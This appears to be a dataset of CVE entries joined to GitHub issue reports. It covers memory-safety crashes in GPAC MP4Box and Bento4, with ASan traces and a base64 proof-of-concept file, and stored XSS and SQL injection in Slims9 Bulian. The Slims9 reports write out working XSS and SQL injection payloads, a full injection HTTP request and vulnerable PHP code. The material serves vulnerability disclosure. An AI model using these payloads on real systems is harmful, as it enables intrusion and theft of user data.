0x610000000494 is located 84 bytes inside of 192-byte region [0x610000000440,0x610000000500) freed by thread T0 here: #0 0x4a203d in free (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a203d) #1 0x7fa7206f69dc in gf_node_free /home/aidai/fuzzing/gpac/gpac-asan/src/scenegraph/base_scenegraph.c:1620:2 previously allocated by thread T0 here: #0 0x4a22bd in malloc (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a22bd) #1 0x7fa72072195c in QuantizationParameter_Create /home/aidai/fuzzing/gpac/gpac-asan/src/scenegraph/mpeg4_nodes.c:12496:2 SUMMARY: AddressSanitizer: heap-use-after-free /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:151:12 in Q_IsTypeOn Shadow bytes around the buggy address: 0x0c207fff8040: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 0x0c207fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff8080: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd =>0x0c207fff8090: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c207fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3330624==ABORTING ```
Use After Free
https://api.github.com/repos/gpac/gpac/issues/2058/comments
1
2022-01-21T08:54:48Z
2022-01-21T11:26:56Z
https://github.com/gpac/gpac/issues/2058
1,110,211,366
2,058
CVE-2022-24576
2022-03-14T14:15:07.877
GPAC 1.0.1 is affected by Use After Free through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2061" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/011ac07c-6139-4f43-b745-424143e60ac7/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2061
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1646-gddd7990bb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/home/aidai/fuzzing/gpac/ Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz poc base64 poc //7/AGUKCio= command: ./MP4Box -info poc Result ================================================================= ==1529455==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001a1a at pc 0x00000043e343 bp 0x7ffeafafa9a0 sp 0x7ffeafafa158 READ of size 11 at 0x602000001a1a thread T0 #0 0x43e342 in StrstrCheck(void*, char*, char const*, char const*) (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342) #1 0x43e171 in strstr (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e171) #2 0x7f61341e32d7 in ctxload_probe_data /home/aidai/fuzzing/gpac/gpac-asan/src/filters/load_bt_xmt.c:837:6 #3 0x7f6134037b52 in gf_filter_pid_raw_new /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:3777:13 #4 0x7f6134153a31 in filein_process /home/aidai/fuzzing/gpac/gpac-asan/src/filters/in_file.c:481:7 #5 0x7f6134030e3a in gf_filter_process_task /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:2515:7 #6 0x7f613401015f in gf_fs_thread_proc /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:1756:3 #7 0x7f613400de3e in gf_fs_run /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:2000:2 #8 0x7f6133c4d27e in gf_media_import /home/aidai/fuzzing/gpac/gpac-asan/src/media_tools/media_import.c:1218:3 #9 0x524fe4 in convert_file_info /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/fileimport.c:128:6 #10 0x4f45c2 in mp4boxMain /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/main.c:6063:6 #11 0x7f61332740b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x429b7d in _start (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x429b7d) 0x602000001a1a is located 0 bytes to the right of 10-byte region [0x602000001a10,0x602000001a1a) allocated by thread T0 here: #0 0x4a22bd in malloc (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a22bd) #1 0x7f613372a4fb in gf_utf_get_utf8_string_from_bom /home/aidai/fuzzing/gpac/gpac-asan/src/utils/utf.c:680:14 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342) in StrstrCheck(void*, char*, char const*, char const*) Shadow bytes around the buggy address: 0x0c047fff82f0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa 00 00 0x0c047fff8300: fa fa 00 00 fa fa 04 fa fa fa 00 00 fa fa 06 fa 0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8320: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 00 0x0c047fff8330: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa fd fd =>0x0c047fff8340: fa fa 00[02]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1529455==ABORTING ```
Heap-based Buffer Overflow
https://api.github.com/repos/gpac/gpac/issues/2061/comments
0
2022-01-21T08:56:18Z
2022-01-21T11:26:35Z
https://github.com/gpac/gpac/issues/2061
1,110,212,655
2,061
CVE-2021-45792
2022-03-17T11:15:07.667
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/slims/slims9_bulian/issues/122
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site script attacks. **To Reproduce** Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site scripting attacks. Administrator login "system" add new "field> fill in cross-site scripting in the NOTE field `(example:'"><svg/onload=alert(document.domain)>)` It will take effect after saving. **Expected behavior** You can insert js scripts to attack. **Screenshots** <img width="1071" alt="3" src="https://user-images.githubusercontent.com/18564938/147060823-4a8328b5-9ea5-400a-80d2-48c4a8828895.png"> <img width="1087" alt="4" src="https://user-images.githubusercontent.com/18564938/147060883-f5af4b94-3587-4dee-9e94-45415050b3eb.png"> **Desktop :** - OS: [MacBook M1] - Browser [Chrome] - Version [96.0.4664.110]
[Security Bug]Stored cross-site script attacks(xss)
https://api.github.com/repos/slims/slims9_bulian/issues/122/comments
0
2021-12-22T08:39:34Z
2021-12-22T08:39:34Z
https://github.com/slims/slims9_bulian/issues/122
1,086,586,652
122
CVE-2021-45793
2022-03-17T12:15:07.843
Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/123" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/slims/slims9_bulian/issues/123
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login "find a book" SQL injection attack in the comments (example:`'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1` ) <img width="934" alt="5" src="https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png"> <img width="756" alt="6" src="https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png"> `SQL Injection request: POST /index.php?p=show_detail&id=17 HTTP/1.1 Host: 192.168.31.63 Content-Length: 110 Cache-Control: max-age=0 Origin: http://192.168.31.63 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9 Referer: http://192.168.31.63/index.php?p=show_detail&id=17 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9 Connection: close comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1 &SaveComment=Save+comment` `Vulnerable code: $_sql = "Select c.comment, m.member_name, c.input_date from comment AS c LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id LEFT JOIN member AS m ON m.member_id = c.member_id WHERE b.biblio_id =".$_detail_id. "ORDER BY c.last_update DESC"; $commlist = $dbs->query($_sql); if ($commlist) { $_all_recs = $commlist->num_rows; } if ($_all_recs >0) { $_page = ($page -1) * $_recs_each_page; $_sql .= "Limit". $_page. ", ". $_recs_each_page; $commlist = $dbs->query($_sql); $_list_comment .='<div class="comment-found">'. $_all_recs. __(' comments available').'</div>'; while ($_data = $commlist->fetch_assoc()) { $_list_comment .='<div class="comments">'; $_list_comment .='<div class="comment-member">'.$_data['member_name']. __(' at'). $_data['input_date']. __(' write').'</ div>'; $_list_comment .='<div class="comment-content">'. $_data['comment'].'</div>'; $_list_comment .='</div>'; } $_list_comment .='<div class="comment-found">'.simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10,'','_self').'</div>'; } if (ISSET($_SESSION['mid'])) { // Comment form $_forms ='<form method="post" action="index.php?p=show_detail&id='.$_detail_id.'" class="comment-form">'; $_forms .= simbio_form_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'<br />'; $_forms .='<input type="submit" name="SaveComment" value="Save comment" class="s-btn btn btn-primary">'; $_forms .= \Volnix\CSRF\CSRF::getHiddenInputString(); $_forms .='</form>'; return $_list_comment.$_forms;`
[Security Bugs] Sql Injection
https://api.github.com/repos/slims/slims9_bulian/issues/123/comments
1
2021-12-22T09:49:53Z
2022-12-23T03:52:33Z
https://github.com/slims/slims9_bulian/issues/123
1,086,645,532
123
CVE-2021-45794
2022-03-17T12:15:07.883
Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/slims/slims9_bulian/issues/124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*", "matchCriteriaId": "EDC3FA43-9AED-4115-B41B-61587D7D784F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/slims/slims9_bulian/issues/124
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "slims", "slims9_bulian" ]
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: `http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1` Vulnerable parameter `id` SQL injection payload `Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551 ` `Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)` <img width="558" alt="7" src="https://user-images.githubusercontent.com/18564938/147107829-026df7bf-f459-43e8-8388-4508075483bc.png"> The problematic code `if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];`
[Security Bugs] SQL Injection
https://api.github.com/repos/slims/slims9_bulian/issues/124/comments
1
2021-12-22T14:29:35Z
2022-12-23T03:51:13Z
https://github.com/slims/slims9_bulian/issues/124
1,086,875,971
124
CVE-2022-27607
2022-03-21T23:15:08.770
Bento4 1.6.0-639 has a heap-based buffer over-read in the AP4_HvccAtom class, a different issue than CVE-2018-14531.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/677" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/677
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
## brief description There is a buffer overflow in AP4_HvccAtom, can be triggered via mp4tag + ASan. ## To reproduce ``` mkdir build && pushd build CC=clang CFLAGS="-fsanitize=address" CXX=clang CXXFLAGS="-fsanitize=address" cmake .. && make -j$(nproc) ./mp4tag --list-symbols --list-keys --show-tags $POC ``` ### output ``` ================================================================= ==2542087==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030000003e6 at pc 0x0000004cfa61 bp 0x7ffffec70440 sp 0x7ffffec70430 READ of size 1 at 0x6030000003e6 thread T0 #0 0x4cfa60 in AP4_HvccAtom::AP4_HvccAtom(unsigned int, unsigned char const*) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cfa60) #1 0x4cc7e5 in AP4_HvccAtom::Create(unsigned int, AP4_ByteStream&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x4cc7e5) #2 0x446dc2 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x446dc2) #3 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #4 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #5 0x5779a8 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5779a8) #6 0x58e0bb in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58e0bb) #7 0x58f042 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x58f042) #8 0x44241c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44241c) #9 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #10 0x5bbbb7 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bbbb7) #11 0x5bafbd in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5bafbd) #12 0x445b0e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x445b0e) #13 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #14 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #15 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #16 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #17 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #18 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #19 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #20 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #21 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #22 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #23 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #24 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #25 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #26 0x47df78 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47df78) #27 0x44c562 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x44c562) #28 0x45123b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x45123b) #29 0x47eccf in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47eccf) #30 0x47f58d in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x47f58d) #31 0x5f6668 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x5f6668) #32 0x7a7726 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/hzheng/workspace/fuzz/mp4tag/mp4tag+0x7a7726) #33 0x444cfd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) 